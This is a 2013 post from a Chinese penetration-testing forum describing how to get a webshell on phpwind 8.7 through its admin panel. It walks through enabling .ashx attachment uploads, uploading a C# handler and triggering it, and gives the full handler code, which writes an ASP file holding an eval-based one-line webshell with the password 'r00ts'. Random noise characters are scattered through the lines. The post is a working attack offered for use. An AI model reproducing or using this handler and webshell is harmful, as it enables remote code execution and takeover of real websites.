中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]

作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小2 _, U' a  s$ |9 k0 F9 @
6 e4 R1 G: P$ E; A8 S
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
# Q  o( I9 j2 @4 w+ p. J# N0 o# I
& @* H. o* A8 |2 W# R. V发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整8 P1 l- d2 O  |1 `5 ?$ O8 a9 }" G
9 @8 X- g  m. h/ b
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx- {+ f) o. v7 y. z+ J
* J5 F  K. X) E, g! }' A$ Q/ X- c
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
0 T# ?& Z- M# u& W
# S/ H; f* i. T* Q! j下面是代码:2 X' p( ?9 H& x1 x2 t
% X" t) I+ D2 C+ ?
<%@ WebHandler Language="C#"Class="Handler" %>
4 N4 S7 W) g9 K& P1 }8 Lusing System;
# X2 X, ]* L8 B6 zusing System.Web;  g( R6 R9 b, _8 C: @1 {$ y" w, b$ C
using System.IO;
) u& o2 F3 _4 |+ Y2 g1 h* ~public class Handler : IHttpHandler {
  Q/ |( N% K2 L* ?public void ProcessRequest (HttpContext context) {* L/ n" p7 w' ~6 u, O
context.Response.ContentType = "text/plain";
$ X1 q: X- i+ [7 R  TStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
2 T  K. C: N7 A! Q- ~% Vfile1.Write("<%eval request(\"r00ts\")%>");
$ D2 a# R/ B6 ?! K3 V) k0 g7 `6 G0 yfile1.Flush();9 d" b  X* U2 f  T; C$ f( P
file1.Close();
" n& s/ U  [8 W  [9 M8 X# }0 H}
5 Z0 N8 s' K; Z* s) g: L, qpublic bool IsReusable {
5 Y3 [, G$ q1 f8 r" b2 T9 D4 Yget {
% a$ e0 \" `0 ]" Z$ c6 M- d8 Kreturn false;, K1 X/ ^& q! D$ T& _& ^. N- a
}+ E$ b5 w' b1 T) r+ W
}
' k8 @; Q/ d5 [, b. f}
8 E1 h. r1 n/ F& p/ `( E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2